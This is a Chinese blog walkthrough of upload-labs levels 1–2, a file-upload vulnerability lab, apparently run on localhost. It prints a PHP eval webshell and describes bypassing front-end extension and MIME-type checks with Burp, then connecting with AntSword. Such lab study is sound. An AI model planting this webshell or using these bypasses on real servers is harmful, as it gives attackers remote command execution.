upload-labs-第一关和第二关

于 2024-06-04 17:45:51 发布
阅读量466 收藏 5
点赞数 7
分类专栏: 渗透学习之路 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/139446451
版权

目录

第一关

思路:

1、上传一个php文件

2、查看源码

3、查看文件上传地址

4、BP抓包,修改文件后缀名

5、使用蚁剑连接

第二关

1、这一关也可以跟第一关一样的方法进行绕过

2、上传一个一句话木马文件

第一关

原理:

思路:
1、上传一个php文件

<?php
phpinfo();
@eval($_POST['cmd']); #一句话木马
?>

结果上传失败,并要求我们上传的文件是图片格式的

2、查看源码

发现在前端的代码作了限制,使用checkFile()来检查文件格式,我们可以使用BP抓包,修改文件的后缀名,进行上传

3、查看文件上传地址

先正常上传一个图片

右键查看图像信息,发现上传文件的保存路径

4、BP抓包,修改文件后缀名

将一句话木马文件后缀改成jpg,然后放包上传

上传成功

访问上传的地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

代码正常执行

5、使用蚁剑连接

连接成功,成功进入主机

第二关

原理:

思路:

1、这一关也可以跟第一关一样的方法进行绕过

下面演示另外一种方法,修改MIME类型

2、上传一个一句话木马文件

上传成功

3、访问上传地址

http://127.0.0.1:90/upload-labs-master/upload/flag.php

php代码正常执行,说明一句话木马也可以执行,用蚁剑连接可以参考上面

这篇文章就先写到这里了,哪里不足欢迎批评指正!

賺钱娶甜甜
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安装upload-labs
10-22
安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个卡,从基础...
upload-labs之第一
田田云逸的博客
10-27 4959
一、靶场简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20,每一都包含着不同上传方式。 靶场安装 由于upload-labs 是一个由php 语言编写的靶场,因此需要在php环境下进行使用。我这里推荐用phpstudy集成环境。 靶场项目地址:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 将源码下载下来之后,在www目录.
upload-labs之1-20通(超详细,全程干货,没有废话)
qq_64652650的博客
10-23 2493
记录,干货,无废话
upload-labs第一
LIULIUAINI66的博客
03-15 559
10、接着说浏览器的问题为啥火狐浏览器就可以edge就不行,搞不懂,但是可以在edge浏览器开发者里把JavaScript给禁用了,那它前端做的限制就没用了哈哈哈,试了一下是ok的,下面两个文件就是分别删除后缀名函数和禁用JavaScript上传的木马。6、那就看看前端代码,右键检查确实是在前端做的限制,之前看谁说一切在前端做的限制都是纸老虎,哈哈哈,对我这个小白就感觉是真老虎了,遇见一堆麻烦。5、接下来我想到在bp里抓包看看把文件后缀改了,结果发现不是后端验证的,那就是前端了。12、上传木马成功的界面。
upload-labs 安装教程&&第一
m0_52701599的博客
02-24 1678
upload-labs 安装教程&&第一
upload-labs19-20以及总结1
08-08
2. **抓包分析**:使用抓包工具(如Wireshark或Burp Suite)可以观察到`filename`和`save_name`字段,了解数据在网络传输过程中的具体形态,有助于我们理解如何构造请求以绕过安全机制。 3. **文件类型检查**:源码...
upload-labs-master.zip
06-22
【标题】"upload-labs-master.zip" 是一个用于学习和实践文件上传漏洞的靶场项目。这个压缩包包含了 "upload-labs-master" 目录的多次副本,这可能表示靶场设计的不同阶段或者不同的练习环境。 【描述】描述中的 ...
135-PHP、Apache环境中部署upload-labs
10-22
二、upload-labs 的下载和解压 在安装了 PHP 和 Apache 环境后,需要下载 upload-labs 的源代码。可以从 GitHub 上下载 upload-labs 的源代码,并将其解压到指定的文件夹中。 Upload-labs 的源代码可以从 ...
Upload-labs 1-20靶场通攻略(全网最全最完整)
dragon的博客
03-15 4437
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为php 当 PHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
upload-labs初学者通详解
weixin_54072578的博客
11-05 2404
Pass-1 js验证绕过 首先在开始之前我们需要在我们导入的upload-labs文件里面新建一个文件夹,方便我们上传php文件 打开第一我们可以看见这个页面 我们将事先准好好的一句话木马文件传上去 可以看到提示,文件夹格式不正确 这时候我们要判断他判断文件代码后缀是在前段还是后端 我们可以查看第一的文件代码,会发现有一个checkFile()函数,(在浏览器的元素审查中找文件上传的js代码可以看到) 这个函数就是检查文件后缀的,我们可以删除这个函数再上传可以成功。...
upload-labs 1-21思路教程
weixin_45612728的博客
06-15 1592
upload-labs新版1-21的全部思路以及过指引
upload-labs详解1-19全解(最全最详细一看就会)
最新发布
qq_53058639的博客
04-16 908
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19,每一都包含着不同上传方式。
upload-labs第1-第10教程
weixin_53730939的博客
02-27 421
upload-labs1-10秘籍
文件上传靶场实战:upload-labs第1-3
01-09 926
本文介绍文件上传靶场upload-labs环境搭建和靶场实战:upload-labs第1-3
upload-labs第1~2 小试牛刀
Lucky小小吴的小屋
02-13 1101
浏览器并不认得这是什么类型,也不知道应该如何展示,只知道这是一种二进制文件,因此遇到content-type为application/octet-stream的文件时,浏览器会直接把它下载下来,在这个靶场就是直接保存在本地文件夹。相对于第一,这一将文件类型判断放在了后端代码上,我们可以通过MIME验证绕过,说说人话,就是。在这里,如果我们想直接上传php文件,且不被拦截到,可以通过burp修改数据包的文件类型,便可以实现。上传一句话木马的jpg,再用burp抓包,把上传的文件名改成。
upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 4604
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
upload-labs第十一
07-25
总之,通过利用%00截断、条件竞争和解析漏洞,我们可以成功绕过文件上传的限制,完成upload-labs第十一的挑战。 #### 引用[.reference_title] - *1* [upload-labs-master 文件上传 第十一和十二]...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值